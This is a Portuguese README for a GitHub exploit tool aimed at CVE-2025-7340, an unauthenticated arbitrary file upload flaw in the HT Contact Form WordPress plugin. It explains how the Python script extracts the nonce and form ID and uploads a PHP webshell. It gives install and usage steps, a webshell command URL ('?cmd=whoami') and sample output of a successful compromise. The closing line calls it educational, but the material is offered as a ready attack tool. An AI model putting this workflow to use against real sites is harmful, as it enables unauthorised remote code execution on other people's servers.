
HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 - Unauthenticated Arbitrary File Upload
CVE: CVE-2025-7340
CVSS: 9.8 (Crítico)
O plugin HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo na função temp_file_upload em todas as versões até, e incluindo, 2.2.1.
Isso permite que atacantes não autenticados façam upload de arquivos arbitrários para o servidor, potencialmente levando à Execução Remota de Código (RCE).
Este repositório inclui um script de exploit em Python que automatiza a descoberta do formulário vulnerável e faz upload de uma webshell para o site afetado.
O script detecta inteligentemente os parâmetros necessários (nonce, form_id, ajax endpoint) e faz upload de um shell PHP no caminho vulnerável.
✅ Exemplo de URL do formulário vulnerável:
http://target.com/contact/
✅ O formulário vulnerável deve estar na página que você passar para a opção -u.
Antes de executar o script, instale os módulos Python necessários:
pip install -r requirements.txt
Conteúdo do requirements.txt:
requests
colorama
usage: CVE-2025-7340.py [-h]
Exploit para CVE-2025-7340 - Upload Arbitrário de Arquivo Não Autenticado | por Khaled Alenazi (Nxploited)
options:
-h, --help mostra esta mensagem de ajuda e sai
-u, --url URL URL alvo, ex.: http(s)://target.com
| Opção | Descrição |
|---|---|
-h, --help | Mostra esta mensagem de ajuda e sai |
-u, --url URL | URL alvo, ex.: http(s)://target.com/contact |
Quando o exploit for concluído com sucesso, você pode acessar o shell enviado no caminho fornecido.
Adicione ?cmd=<seu_comando> para executar comandos do sistema.
✅ Exemplo:
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami
Iniciando exploit contra o alvo...
Obtendo página alvo...
Extraindo parâmetros...
Nonce extraído: 346c441903
Endpoint AJAX: http://nxploit.ddev.site/wp-admin/admin-ajax.php
ID do Formulário: 86
Gerando webshell...
Enviando shell, aguarde...
[+] Exploit realizado com sucesso!
Acesse: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php
Exploit por: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited
Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa.
O autor não é responsável por qualquer dano ou uso indevido deste código.
Sempre tenha permissão explícita antes de testar contra qualquer sistema.
Khaled Alenazi (Nxploited)
GitHub: Nxploited